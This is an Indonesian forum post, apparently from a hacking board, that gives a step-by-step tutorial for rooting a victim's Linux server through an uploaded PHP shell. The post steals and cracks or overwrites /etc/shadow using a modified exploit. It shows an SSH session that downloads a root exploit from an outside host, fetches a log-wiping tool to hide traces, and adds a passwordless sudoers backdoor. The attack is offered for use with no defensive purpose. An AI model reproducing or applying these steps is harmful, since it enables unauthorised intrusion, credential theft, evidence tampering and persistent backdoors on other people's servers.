Would you like to react to this message? Create an account in a few clicks or log in to continue.


Thu Nov 21, 2024 11:27 pm
 
Indeks★Forumdns★Latest imagesPencarianPendaftaranLogin

Kirim topik baru   Kirim balasan :: 他のもの ( Other Things ) :: チュートリアルとヒント(Tutorials & Tips)
 

 Tutor Rooting Box tanpa Bind dan Back Connect

Go down 
PengirimMessage





VIP

Join date : 01.01.70

Tutor Rooting Box tanpa Bind dan Back Connect Empty
PostSubyek: Tutor Rooting Box tanpa Bind dan Back Connect   Tutor Rooting Box tanpa Bind dan Back Connect EmptyMon Feb 06, 2012 3:19 pm
Berikut ini langkah2 nya untuk ngeroot saat gak bisa bc dan bind di mana kondisi box ada ssh daemon :
pertama 2 silahkan
download exploitnya maling_shadow.c lalu compile.

Setelah dikompile di kompie Anda, upload ke php shell Anda dan jalankan untuk mencolong isi /etc/shadow di server:
./maling_shadow

maka jika kernel belum dipatch akan tercipta 1 file yg namanya : shadow

Selanjutnya kita download file shadow tadi ke lokal ( komputer kita).

Ok langkah selanjutnya kita crack dengan jtr di lokal, Untuk
mendapatkan password ssh atau bisa juga kita edit file shadow di lokal
kita, kita edit salah satu user dg /bin/sh atau /bin/bash dg password
dari /etc/shadow punya kita di lokal. Lalu dari komputer lokal kita
upload file shadow yg udah kita edit tadi ke server korban.



Selanjutnya,

exploit maling_shadow di atas, line kode yang:
system (“cat /etc/shadow > shadow”);
kita ganti dengan:
system (“mv shadow /etc/shadow”);

kompile !!! lalu silahkan upload, misal nama exploitnya jadi:
tiban_shadow

Selanjut di server korban , kita tiban shadow lama dg exploit ini:
./tiban_shadow

Selanjutnya Anda bisa login ke server korban via ssh (dg catatan port ssh open):
misal dalam kasus ini saya meniban password user: games

<blockquote>
bt ~ # ssh games@ip_server_korban
games@ip_server_korban's password:
Linux ???????????? Tue Feb 12 01:19:08 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ cd /tmp;wget http://codex.fadli-tn.info/tools/exploit/sploit2009.tgz
$tar zxvf sploit2009.tgz
$cd sploit2009
# id
uid=0(root) gid=0(root) groups=60(games)
#
</blockquote>
Selanjutnya kita akan lakukan clear logs (PERHATIAN!!! JANGAN PERNAH
MENGHAPUS LOG!!! LAKUKAN EDITING DENGAN TOOL, misal : vanish)

<blockquote>
#wget http://codex.fadli-tn.info/tools/exploit/van.tgz;cd van
#./vanish games localhost ip
</blockquote>
Ok selanjutnya klo mao nakal2:

<blockquote>
#cd /etc;nano sudoers
</blockquote>
lalu tambahkan line ini untuk privilege sudo user games tanpa password:

<blockquote>
games ALL = NOPASSWD: ALL
</blockquote>
Kembali Ke Atas Go down
 
Tutor Rooting Box tanpa Bind dan Back Connect
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda dapat menjawab topik
 :: 他のもの ( Other Things ) :: チュートリアルとヒント(Tutorials & Tips)-
Kirim topik baru   Kirim balasanNavigasi: